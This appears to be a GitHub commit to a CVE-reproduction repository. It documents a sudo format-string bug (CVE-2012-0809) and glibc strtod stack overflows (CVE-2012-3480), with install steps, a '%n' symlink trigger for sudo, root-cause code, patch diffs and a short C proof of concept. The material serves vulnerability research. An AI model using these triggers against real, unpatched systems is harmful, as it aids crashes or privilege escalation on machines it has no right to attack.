Skip to content
Permalink
Browse files

add info for two CVEs

  • Loading branch information...
mudongliang committed May 30, 2018
1 parent c1cb081 commit 5c8dac58b872ad1fd3ccf7d869e3340de33f75f7
Showing with 125 additions and 4 deletions.
  1. +76 −1 CVE-2012-0809/README.md
  2. +25 −1 CVE-2012-3480/README.md
  3. +22 −0 CVE-2012-3480/poc.c
  4. +2 −2 README.md
@@ -1,19 +1,94 @@
# CVE/EDB ID
# CVE-2012-0809

## Experiment Environment

Ubuntu 14.04LTS

## INSTALL & Configuration

```
wget https://github.com/mudongliang/source-packages/raw/master/CVE-2012-0809/sudo-1.8.0.tar.gz
tar -xvf sudo-1.8.0.tar.gz
cd sudo-1.8.0
./configure
make
```

## Problems in Installation & Configuration


## How to trigger vulnerability

```
cd src
ln -s ./sudo %n
sudo ./%n -D9
*** %n in writable segment detected ***
```

## PoCs

[Sudo format string vulnerability](https://www.sudo.ws/sudo/alerts/sudo_debug.html)

[](http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt)

## Vulnerability Details & Patch

### Root Cause

```
void
sudo_debug(int level, const char *fmt, ...)
{
va_list ap;
char *fmt2;
if (level > debug_level)
return;
/* Backet fmt with program name and a newline to make it a single
write */
easprintf(&fmt2, "%s: %s\n", getprogname(), fmt);
va_start(ap, fmt);
vfprintf(stderr, fmt2, ap);
va_end(ap);
efree(fmt2);
}
```

Here getprogname() is argv[0] and by this user controlled. So
argv[0] goes to fmt2 which then gets vfprintf()ed to stderr. The
result is a Format String vulnerability.

### Stack Trace

### Patch

```
diff -urNa sudo-1.8.3p1/src/sudo.c sudo-1.8.3p2/src/sudo.c
--- sudo-1.8.3p1/src/sudo.c Fri Oct 21 09:01:26 2011
+++ sudo-1.8.3p2/src/sudo.c Tue Jan 24 15:59:03 2012
@@ -1208,15 +1208,15 @@
sudo_debug(int level, const char *fmt, ...)
{
va_list ap;
- char *fmt2;
+ char *buf;
if (level > debug_level)
return;
- /* Backet fmt with program name and a newline to make it a single write */
- easprintf(&fmt2, "%s: %s\n", getprogname(), fmt);
+ /* Bracket fmt with program name and a newline to make it a single write */
va_start(ap, fmt);
- vfprintf(stderr, fmt2, ap);
+ evasprintf(&buf, fmt, ap);
va_end(ap);
- efree(fmt2);
+ fprintf(stderr, "%s: %s\n", getprogname(), buf);
+ efree(buf);
}
```

## References
@@ -1,19 +1,43 @@
# CVE/EDB ID
# CVE-2012-3480

## Experiment Environment

Ubuntu 8.10

## INSTALL & Configuration

Preinstalled environment

## Problems in Installation & Configuration


## How to trigger vulnerability

```
gcc -o poc poc.c
./poc
```

## PoCs

[GNU glibc - Multiple Local Stack Buffer Overflow Vulnerabilities](https://www.exploit-db.com/exploits/37631/)

[GNU glibc Multiple Local Stack Buffer Overflow Vulnerabilities](https://www.securityfocus.com/bid/54982/exploit) misses one "#" before the 1st line

[CVE-2012-3480 glibc: Integer overflows, leading to stack-based buffer overflows in strto* related routines](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-3480)

[Bug 14459 (CVE-2012-3480) - strtod integer and buffer overflows (CVE-2012-3480)](https://sourceware.org/bugzilla/show_bug.cgi?id=14459)

## Vulnerability Details & Patch

### Root Cause

### Stack Trace

### Patch

Details are in <https://sourceware.org/ml/libc-alpha/2012-08/msg00202.html>

## References

<https://bugs.gentoo.org/431218>
@@ -0,0 +1,22 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define EXPONENT "e-2147483649"
#define SIZE 214748364
int
main (void)
{
char *p = malloc (1 + SIZE + sizeof (EXPONENT));
if (p == NULL)
{
perror ("malloc");
exit (EXIT_FAILURE);
}
p[0] = '1';
memset (p + 1, '0', SIZE);
memcpy (p + 1 + SIZE, EXPONENT, sizeof (EXPONENT));
double d = strtod (p, NULL);
printf ("%a\n", d);
exit (EXIT_SUCCESS);
}
@@ -167,9 +167,9 @@ If you encounter problems with keyword "Failed to lock files", you could try to
- [ ] CVE-2011-1137
- [ ] CVE-2011-1938
- [ ] CVE-2011-5033
- [ ] CVE-2012-0809
- [x] CVE-2012-0809
- [x] CVE-2012-2386
- [ ] CVE-2012-3480
- [x] CVE-2012-3480
- [x] CVE-2012-4409
- [x] CVE-2012-4412
- [x] CVE-2012-4424

0 comments on commit 5c8dac5

Please sign in to comment.
You can’t perform that action at this time.